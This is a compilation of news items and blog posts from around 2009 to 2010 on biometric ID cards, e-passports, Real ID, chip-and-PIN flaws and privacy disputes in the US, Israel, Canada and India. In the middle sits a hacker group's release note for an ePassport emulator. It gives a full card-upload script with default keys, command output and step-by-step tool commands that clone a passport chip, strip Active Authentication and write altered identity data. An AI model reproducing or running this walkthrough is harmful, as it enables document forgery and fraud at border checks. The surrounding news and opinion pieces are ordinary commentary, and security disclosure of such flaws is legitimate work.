The New Hampshire legislature is considering a bill which would ban biometric data, including fingerprints, retinal scans, DNA, palm prints, facial feature patterns, handwritten signature characteristics, voice data, iris recognition, keystroke dynamics, and hand characteristics from being used in state or privately issued ID cards, except for employee ID cards

The move toward biometric IDs is accelerating, but New Hampshire wants to buck this trend. Acting out of concerns for residents’ privacy, the New Hampshire Legislature is considering a bill that would ban the use of biometrics data in identification cards. At least two trade groups oppose the legislation, saying biometrics technology has a number of security benefits.

The bill would prohibit biometrics data, including fingerprints, retinal scans, and DNA, from being used in state or privately issued ID cards, except for employee ID cards. In addition, it would ban the use of ID devices or systems that require the collection or retention of an individual’s biometric data.

SC Magazine’s Angela Moscaritolo writes that under the bill, biometric data would also include palm prints, facial feature patterns, handwritten signature characteristics, voice data, iris recognition, keystroke dynamics, and hand characteristics. “That’s the kind of information the government shouldn’t generally require to be gathered about an individual,” New Hampshire Representative Daniel Itse, who co-sponsored the bill, toldSCMagazineUS.com on Wednesday.

The bill has drawn criticism from several organizations, including the Security Industry Association (SIA), a business trade group covering the electronic and physical security market. “SIA firmly believes that the broad restrictions proposed by [the bill]… reflects a significant misunderstanding of the security features and privacy safeguards of this widely-adopted technology,” the group said in a statement. SIA encouraged a New Hampshire House committee to reject the bill and conduct a study into the merits of biometrics technology.

Moscaritolo writes that this is the only pending bill of its kind in the nation, but in the past there have been similar legislative actions taken in opposition of biometrics technology, Don Erickson, director of government relations for SIA, told SCMagazineUS.com. “We are concerned about seeing a pattern of these bills start to pop up in states, which will result in a patchwork of different laws that organizations would have to comply with,” Erickson said.

A similar bill, introduced several years ago in Pennsylvania to limit the use of biometrics, was never acted on, Erickson said.

In contrast, numerous bills have passed at the state and federal levels to authorize and implement systems that use biometrics technology for personal identification, Walter Hamilton, chairman and president of the International Biometric Industry Association (IBIA), a nonprofit trade association representing developers, manufacturers, and integrators of biometrics, told Moscaritolo. “We think it’s inappropriate to single out a technology and say, ‘Thou shall not use,’” Hamilton said. “We think there are many examples of useful applications where it protects citizens.” The use of biometrics can thwart fraud and identity theft by ensuring a person is who they claim to be, he said.

Moscaritolo notes that the bill was introduced in January in the New Hampshire HouseCommerce and Consumer Affairs Committee. It was the subject of a public hearing Tuesday and is scheduled for discussion Thursday in an executive session of the committee.

If Simple Credit Cards are cloneable just imagine how ”New ID cards” are supposed to be ‘unforgeable’ – but it took expert minutes to clone one, and program it with false data

By Cory Doctorow at 11:43 PM February 11, 2010

(Chip and PIN is broken via Schneier)

BBC: New flaws in chip and pin system revealed

Noted security researcher Ross Anderson and colleagues have published a paper showing how “Chip-and-PIN” (the European system for verifying credit- and debit-card transactions) has been thoroughly broken and cannot be considered secure any longer. I remember hearing rumbles that this attack was possible even as Chip-and-PIN was being rolled out across Europe, but that didn’t stop the banks from pushing ahead with it, spending a fortune in the process.

The flaw is that when you put a card into a terminal, a negotiation takes place about how the cardholder should be authenticated: using a PIN, using a signature or not at all. This particular subprotocol is not authenticated, so you can trick the card into thinking it’s doing a chip-and-signature transaction while the terminal thinks it’s chip-and-PIN. The upshot is that you can buy stuff using a stolen card and a PIN of 0000 (or anything you want). We did so, on camera, using various journalists’ cards. The transactions went through fine and the receipts say “Verified by PIN”.

It’s no surprise to us or bankers that this attack works offline (when the merchant cannot contact the bank) — in fact Steven blogged about it here last August.

But the real shocker is that it works online too: even when the bank authorisation system has all the transaction data sent back to it for verification. The reason why it works can be quite subtle and convoluted: bank authorisation systems are complex beasts, including cryptographic checks, account checks, database checks, and interfaces with fraud detection systems which might apply a points-scoring system to the output of all the above. In theory all the data you need to spot the wedge attack will be present, but in practice? And most of all, how can you spot it if you’re not even looking? The banks didn’t even realise they needed to check.

Letter

Executive Committee Home

Submitted by MacRonin on December 13, 2009 – 7:00pm

Real ID Follies Continue with PASS ID Waiting in the Wings: Via EFF.org Updates.

Since 2007, the U.S. State Department has been issuing high-tech “e-passports,” which contain computer chips carrying biometric data to prevent forgery. Unfortunately, according to a March report from the Government Accountability Office (GAO), getting one of these supersecure passports under false pretenses isn’t particularly difficult for anyone with even basic forgery skills.

As 2009 draws to a close, we’re inching ever deeper into the corner that Congress painted us into by passing Real ID under the table in 2005. (Recall that Real ID is the failed, Bush-era attempt to turn state drivers licenses into national ID cards by forcing states to collect and store licensee data in databases, and refusing to accept non-compliant IDs for federal purposes, like boarding a plane or entering a federal building.)

The official deadline for states to comply with the Department of Homeland Security’s (DHS) final Real ID rule is December 31, 2009, and an estimated 36 states will not be in compliance by then, leading to some ambiguity for many citizens. For example, will residents of Montana be able to board planes in January 2010 with only a driver’s license (a state-supplied, technically non-compliant document) and without a passport (an identity document issued by the federal government)?

Past history strongly suggests that DHS will issue last-minute waivers to states that have not amped up their drivers licenses to adhere to Real ID. Early in 2008, states that actively opposed Real ID received waivers from DHS, nominally marking the states as “compliant” despite strongly-stated opposition to ever implementing Real ID.

But waiting in the wings is PASS ID, a bill that attempts to grease the wheels by offering money to the states to implement ID changes. Despite having the appearances of reform, PASS ID essentially echoes Real ID in threatening citizens’ personal privacy without actually justifying its impact on improving security. For this reason, PASS ID is not popular — privacy advocates refuse to support the bill because it still creates a national ID system. It still mandates the scanning and storage of applicants’ critical identity documents (birth certificates, visas, etc.), which will be stored in databases that will become leaky honeypots of sensitive personal data — prime targets for malicious identity thieves or otherwise accessible by individuals authorized to obtain documents from the database. And on the other side, short-sighted surveillance hawks are unhappy with the bill because they support the privacy violations architected into the provisions of the original Real ID Act.

As such, advocates of PASS ID are publicly wringing their hands over the deadline in order to encourage Congress to approve the PASS ID Act before the end of the year. But the fracas over health reform is suffocating any chance for meaningful debate about the merits of PASS ID before the Dec. 31st deadline.

A pragmatic analysis should show that Real ID is dead. To date, 24 states have enacted resolutions or binding legislation prohibiting participation in Real ID, and the varied, desperate efforts to reanimate it are misguided. Whether the states or the federal government signs the invoice, the cost ultimately falls to taxpayers, who should be troubled that neither Real ID nor PASS ID is likely to fulfill the stated goal of stopping terrorists from obtaining identity documents. (Just this week, noted security expert Bruce Schneier linked to a report about government investigators successfully using fake identity documents to obtain high-tech “e-passports,” which were then used to buy plane tickets, and board flights — the point being that a fancy, “secure” identity document doesn’t stop individuals from exploiting a weak bureaucracy.)

On the other hand, the resulting databases filled with scanned identity documents will, create tantalizing targets for identity thieves and headaches for people whose digital documents are pilfered; and a national ID system will invite mission creep from the government as well as private entities like credit reporting agencies and advertisers. It’s high time for reason to replace the reflexive defense of a failed scheme. Congress should repeal Real ID for real and seek more inspired, protective solutions to identity document security.

ISRAEL at Risk of Not Being a Democracy Anymore: Knesset Approves INVASIVE ‘Biometric Law’

Anyone who follows the news has no doubt come across the claim that “Israel is the only democracy in the Middle East.” Usually, this claim is followed by its logical inference: “As an island of freedom located in a region controlled by military dictators, feudal kings and religious leaders” - Not any more – Israel democracy is now controlled by superficial politicians…

Black Day for Democracy

By Gil Ronen and Nissan Ratzlav-Katz

(IsraelNN.com) The Knesset plenum approved Monday evening the ‘Biometric Law’ in the final readings. Forty Knesset members voted in favor of the law, 11 against and three abstained. The purpose of the law is the creation of a biometric database that would hold the fingerprints and facial photos of all of the country’s citizens. The data would be stored in the Interior Ministry computers.

MK Nitzan Horowitz (Meretz), who led the opposition to the law, said after its approval that the vote was “a serious mistake which causes grave harm to freedom of the individual in Israel.”

“I hope that we do not pay too heavy a price for it,” Horowitz said. “In any case, it has been proven that an unrelenting public struggle by idealists can have influence and make a difference. The proof is that the law in its final wording is completely different from the original version.”

During the Knesset debate about the law, MK Horowitz stood at the podium and held up printouts of information from the Ministry of Interior’s database which contained information about Knesset members and which reached the Internet. He said that he would not show the contents so as not to invade the MKs’ privacy. “The leaked data which reached my hands prove how easy it is to break into government databases,” he said. “I hope that this will not be the fate of the biometric database.”

MK Dov Henin (Hadash) said that despite the government’s statements that it would not force Israeli citizens to join the database, “in fact, whoever does not do so would be punished – he will not be able to leave the country’s borders, since he would not receive a passport at the level required in developed countries.” The database is not truly a voluntary one, he said.

Faked fingerprints
On the same day that the Knesset approved the law, there news from Tokyo that appeared to show that this system, too, was not foolproof. Police in the Japanese capital said that they arrested a 27-year-old Chinese woman suspected of illegally entering the country after surgically altering her fingerprints to deceive a biometric recognition system operated by immigration officials.

Commissioner warns passport office not to include biometric info on radio chips

By ALTHIA RAJ, NATIONAL BUREAU

The federal privacy watchdog has rejected Passport Canada’s plan to embed fingerprints and iris scans in electronic passports.

In a review of the project, the Office of the Privacy Commissioner told the passport office not to include new biometric information on a radio-frequency chip encoded in e-passports.

“The more information you collect, the more information you put at risk,” said assistant privacy commissioner Chantal Bernier.

She said Passport Canada “backed away” from putting more data on the chip than they currently collect.

DIGITIZED PICTURE

E-passports will feature a digitized picture of the passport holder as well as their name, date of birth, location of birth and passport number, said Passport Canada spokesman Jean-Sebastien Roy.

A national rollout of the e-passport is expected to begin in 2011.

“(They provide) greater protection against fraudulent misuse and tampering, and reduce the risk of identity fraud,” Roy said.

The privacy commissioner’s review raised concerns about whether the chip is “adequately protected against unauthorized interception,” such as skimming and eavesdropping. The watchdog noted an e-passport hacking case in the United Kingdom.

“If the data can be readily copied and replicated, electronic passports may do more to facilitate identity theft than to prevent it,” said Jason Gratl of the B.C. Civil Liberties Association.

The passport office said its chip can only be read 10 cm away.

‘HIGH RISKS’

David Harris, former chief of strategic planning for the Canadian Security Intelligence Service (CSIS), said there are “high risks” associated with electronic databases, but comprehensive information such as biometrics in passports are needed to guard against terrorist threats.

“We’ve got to be all the more careful in doing what might prove to be unavoidable,” he said.

Canadian e-passports were developed after the International Civil Aviation Organization adopted new requirements for an embedded chip in 2005.

Privacy advocates say the chip raises additional concerns, such as the potential to build databases that track travellers across national boundaries.

“It substantially increases the powers of the state to survey individuals,” said University of Toronto professor Andrew Clement. Databases are often created with one goal and then used for other purposes, he said.

Richard Rosenberg of the Freedom of Information and Privacy Association said he is concerned Canadians won’t be able to check the accuracy of the information on the chip and risk being unfairly blacklisted like many travellers on the no-fly list.

The passport office said it has no plans to collect or use the information in other ways and promised to investigate options to allow individuals to access the data on their chip.

ALTHIA.RAJ@SUNMEDIA.CA

THC/vonJeek proudly presents an ePassport emulator. This emulator applet
allows you to create a backup of your own passport chip(s).


The government plans to use ePassports at Immigration and Border
Control. The information is electronically read from the Passport
and displayed to a Border Control Officer or used by an automated
setup. THC has discovered weaknesses in the system to (by)pass the
security checks. The detection of fake passport chips does not
work. Test setups do not raise alerts when a modified chip
is used. This enables an attacker to create a Passport with an
altered Picture, Name, DoB, Nationality and other credentials.

The manipulated information is displayed without any alarms going off.
The exploitation of this loophole is trivial and can be verified using
thc-epassport.

Regardless how good the intention of the government might have been, the
facts are that tested implementations of the ePassports Inspection System
are not secure.

ePassports give us a false sense of security: We are made to believe
that they make usemore secure. I'm afraid that's not true: current
ePassport implementations don't add security at all.

Thanks to Elv1s for beta testing!

Just follow two easy steps:

(1) Upload the emulator code to a blank JCOP v4.1 72k smart card
Use your favorite tool to upload the CAP file. As an example GPShell is
used. The script used to upload the CAP file:

P:\GPShell-1.4.2>type epassport.script
mode_211
enable_trace
establish_context
// edit the following line to match your PCSC reader
card_connect -readerNumber 3
select -AID A000000003000000
open_sc -security 3 -mac_key 404142434445464748494A4B4C4D4E4F -enc_key 404142434445464748494A4B4C4D4E4F -kek_key 404142434445464748494A4B4C4D4E4F
delete -AID A00000024710
install -file epassport.cap -priv 2
card_disconnect
release_context

A sample output of an actual upload:

P:\GPShell-1.4.2>GPShell.exe epassport.script
mode_211
enable_trace
establish_context
card_connect -readerNumber 3
* reader name OMNIKEY CardMan 5x21-CL 0
select -AID a000000003000000
Command --> 00A4040008A000000003000000
Wrapped command --> 00A4040008A000000003000000
Response <-- 6F108408A000000003000000A5049F6501FF9000
..
..
..
Wrapped command --> 84E60C002506A0000002471007A000000247100107A00000024710010100
02C90000B918E8E43A25117700
Response <-- 9000
card_disconnect
release_context

The CAP file currently supports the following files:

 * EF.COM :    32 bytes (required file)
 * EF.SOD :  2560 bytes (required file)
 * EF.DG1 :    96 bytes (required file)
 * EF.DG2 : 24576 bytes (required file)
 * EF.DG11:    64 bytes (optional, e.g. USA)
 * EF.DG12:    96 bytes (optional, e.g. USA)
 * EF.DG13:    96 bytes (optional, e.g. Japan, France)
 * EF.DG15:   192 bytes (optional, e.g. The Netherlands)

If you need support for other / larger DGs, please let vonJeek know.

(2a) Clone the chip
Using a customized THC version of Adam Laurie's RFIDIOt tools, you're able
to read a chip's content and to write it to an emulator.

P:\RFIDIOt-vonjeek>mrp0wn.py CLONE M3V0NJ33K000000999999

===============================================================================
= mrp0wn.py, an RFIDIOt ePassport utility by vonJeek <mailto:vonjeek@thc.org> =
= Use Jeroen van Beek's ePassport emulator as the target device.              =
===============================================================================
Put a ePassport near the terminal and press enter to continue...
Reading document using KEY M3V0NJ33K000000999999, please be patient...
Put the emulator near the terminal and press enter to continue...
Writing new ePassport using files in /tmp.
Writing /tmp/EF_COM.BIN: 0 bytes left...
Writing /tmp/EF_SOD.BIN: 0 bytes left...
Writing /tmp/EF_DG1.BIN: 0 bytes left...
Writing /tmp/EF_DG2.BIN: 0 bytes left...
Setting the secret key to M3V0NJ33K200000009999998.

Done, happy mrp0wning  

Use the following command to read the chip:
./mrpkey.py "M3V0NJ33Kxxxx000000xx999999xxxxxxxxxxxxxxxxx"

If your chip is protected using the optional Active Authentication mechanism,
the Active Authentication data group (DG15, tag 0x6F) is removed from EF.COM
as demonstrated by Jeroen van Beek at the 2008 USA BlackHat Briefings. Note
that mrp0wn.py's parameter 'STRIP_AA' must be set to the value 'True'. This
attack will work on all inspection system implementations that are using e.g.
ICAO's "worked examples", see this site for more info on that.

(2b) Write saved data
It's also possible to write chip data you've saved earlier using RFIDIOt's
mrpkey.py. As an example you can use vonJeek's ePassport data. Note that
this data is self-signed: vonJeek started his own country 

P:\tmp>unzip vonjeek-epassport_dump.zip
Archive:  vonjeek-epassport_dump.zip
 extracting: EF_COM.BIN
  inflating: EF_DG2.BIN
  inflating: EF_DG1.BIN
 extracting: EF_SOD.BIN 

P:\>cd \RFIDIOt-vonjeek 

P:\RFIDIOt-vonjeek>mrp0wn.py WRITE /tmp

===============================================================================
= mrp0wn.py, an RFIDIOt ePassport utility by vonJeek ;lt;mailto:vonjeek@thc.org> =
= Use Jeroen van Beek's ePassport emulator as the target device.              =
===============================================================================
Document type is PASSPORT.
Put the emulator near the terminal and press enter to continue...
Writing new ePassport using files in /tmp.
Writing /tmp/EF_COM.BIN: 0 bytes left...
Writing /tmp/EF_SOD.BIN: 0 bytes left...
Writing /tmp/EF_DG1.BIN: 0 bytes left...
Writing /tmp/EF_DG2.BIN: 0 bytes left...
Setting the secret key to M3V0NJ33K200000009999998.
Done, happy mrp0wning  

Use the following command to read the chip:
./mrpkey.py "M3V0NJ33Kxxxx000000xx999999xxxxxxxxxxxxxxxxx"

You can also alter data before writing it to an emulator chip. If you want
to do that: this document contains details about - amongst others - DG1 and
DG2 encoding. If you've updated the DGs you can sign them using Peter
Gutmann's CryptLib. 

A read-out of vonJeek's ePassport chip using the reference implementation
named Golden Reader Tool can be seen below.

If you're interested in ePassport related PKI (how to verify whether chip
content is signed by a bonafide authority?) please check the following URLs:

* http://www2.icao.int/en/MRTD/Pages/icaoPKD.aspx
* http://www.icao.int/icao/en/atb/meetings/2008/TagMRTD18/TagMrtd18_ip04.pdf
* http://www.csca-si.gov.si/TR-PKI_mrtds_ICC_read-only_access_v1_1.pdf
* http://www.timesonline.co.uk/tol/news/uk/crime/article4467106.ece
* http://www.timesonline.co.uk/tol/news/uk/crime/article4467098.ece 

Yours sincerly,

vonjeek [at] thc dot org
The Hackers Choice

http://www.thc.org

Posted By Mark Roberti, 10.28.2009

RFID JOURNAL BLOG

An international civil society coalition has published a declaration,Global Privacy Standards for a Global World, that—among other things—calls for “a moratorium on the development or implementation of new systems of mass surveillance, including facial recognition, whole body imaging, biometric identifiers and embedded RFID tags, subject to a full and transparent evaluation by independent authorities and democratic debate.”
The declaration is signed by 68 organizations from around the world. While I agree with the coalition’s goal to assure individuals’ privacy, I’m amazed that the group has such a shallow understanding of the nature of technology and its role in furthering the welfare of the human race. Perhaps it pines for the days when people lived in caves, and no one worried about privacy.

The problem is that these organizations have a bias that some technologies are good and some are bad. They believe the ones they declare to be good should be funded by the government and promoted, while the ones they think are bad should be halted until they can be studied and sufficient safeguards can be put in place.

Technologies are neither good nor evil, however. They are tools that can be used for good or evil. It might seem to make sense to call for a moratorium on technology, but who chooses which technologies we should hold off using until they are studied? Should we have a moratorium on any technology that removes carbon dioxide from the atmosphere, for example? My guess is that the organizations that signed the civil society declaration would say no, because anything that reduces carbon dioxide would reduce global warming and would, thus, be a “good” technology.

Renowned physicist Freeman Dyson, however, argues that more carbon dioxide and warmer climates are actually healthy for plants, because they grow better in such conditions, and that could lead to greater food production and less hunger in the world. He also points out that forcing a massive reduction in carbon emissions would slow global economic growth and hurt the world’s poor.

Even if you disagree with Dyson, the reality is that we don’t know what the result of carbon-reducing technologies would be, any more than we know precisely what the impact of global warming will be. So perhaps we should put a moratorium on efforts to reduce carbon dioxide in the atmosphere until we can conclusively prove that it would be good for the planet. Ridiculous? Of course it is—but no more ridiculous than banning any other technology until we understand its every ramification.

The fact is, enacting a moratorium on technology means ending technological advancement as we know it, because you can’t know the implications of a technology until you deploy it. If we had put a moratorium on the deployment and use of the Internet, would the people who studied it have envisioned the rise of social networking and come up with ways to protect privacy while allowing them to flourish? No, of course not—no one saw the phenomenon of social networking coming. Governments must allow technologies to be deployed and address problems as they arise. If we had done with the Internet what these groups are suggesting for RFID, there would be no Internet today—we’d still be studying its implications—and while there would have been greater privacy in the world, no one can argue the world would be better off.

The declaration’s description of RFID as a “mass surveillance” technology betrays the signatories’ bias. RFID could potentially be used as a surveillance technology, but that is definitely not how most companies are looking to deploy it (unless you consider asset- and inventory-tracking “surveillance”). Perhaps these groups are ignorant of the way RFID is being utilized, but I think there’s more to it than that: The people behind this civil society declaration just aren’t thinking very deeply about the issues.

These groups think privacy is good, and that any technology that could infringe on privacy is bad—and that’s a very simplistic view. Surveillance cameras are being used increasingly by governments around the world, and by retailers to reduce theft. These can be abused. Governments can, for instance, use cameras to track political enemies. But what if cameras bring down the overall crime rate in a troubled urban area, and enjoy the wholehearted support of those who live in that area? Are the cameras bad? Should they be removed, as the coalition suggests, until every possible implication of their use can be fully studied?

What if, heaven forbid, the daughter of one of the people behind the declaration were kidnapped on a street corner, or in the parking lot of a shopping mall? Would that person argue that the police should not review the tapes to see if the kidnapper could be identified, because other people might be identified as well, and that it would infringe on their privacy? If the tapes did reveal the identity of the kidnapper and the girl was rescued, would the signer still argue that there should be a moratorium on such surveillance technologies?

Technology issues are simple when you view them through the prism of your own biases, but the reality is that these issues are far more complex than opponents imagine, and it’s laughable to think a bunch of people can sit around and determine how or when new technologies should be used for the benefit of all mankind (Prometheus, after all, never anticipated that there would be arsonists). Let’s hope, for the good of humanity, that the calls for a moratorium go unanswered.

Mark Roberti is the founder and editor of RFID Journal.

Randeep Ramesh in Delhi
guardian.co.uk, Wednesday 16 September 2009 20.33 BST
___________________________________________________________________________________________
In India, Big Brother just wants to help. The country’s 1.2 billion citizens are to be issued with a biometric identity card in an attempt to improve the delivery of India’s inefficient public services – a move civil liberties’ activists are condemning as the act of a “surveillance society”.

This month, the country began the ambitious scheme of issuing everyone with a unique identity number. Within the first five years of the scheme, giant computer servers will hold the personal details of at least 600 million people. The introduction of what will be one of the world’s most ambitious IT projects will cost an estimated £1.5bn.

The scheme is the brainchild of Nandan Nilekani, one of India’s best-known software tycoons and now head of the government’s Unique Identification Authority. “We are going to have to build something on the scale of Google but it will change the country … every person for first time [will] be able to prove who he or she was.”

The country’s red tape is legendary: Indians have dozens of types of identity verification, ranging from electoral rolls to ration cards, yet almost none can be used universally. The new system will be a national proof of identity, effective for everything, from welfare benefits to updating land records.

Nilekani said the scheme would help the poor especially. Moving from one state to another – a regular occurrence for poor villagers in search of work – often meant benefits were withdrawn because proof of residence was lacking. “This will mean maids and labourers … a hundred or two hundred million people – will be able to access welfare benefits for the first time without any questioning who they are.”

Eventually, cards will hold the person’s name, age, and birth date, as well as fingerprint or iris scans, though no caste or religious identification. “We are not profiling a billion people. This will provide an ID database which government can access online. There will be checks and balances to protect identities,” said Nilekani, who has also been in talks to create a personalised carbon account so that all Indians might buy “green technologies” using a government subsidy.

Doubts have been raised over privacy and the complex security needed to police such the system, as well as concerns that the project is just too ambitious. “We could have a hacking Olympics,” said Guru Malladi, a partner at Ernst & Young.

Civil liberty campaigners fear the card could be a tool of repression.

Nandita Haskar, a human rights lawyer, said: “There’s already no accountability in regard to violations of human and civil rights. In this atmosphere what are the oversight mechanisms for this kind of surveillance?”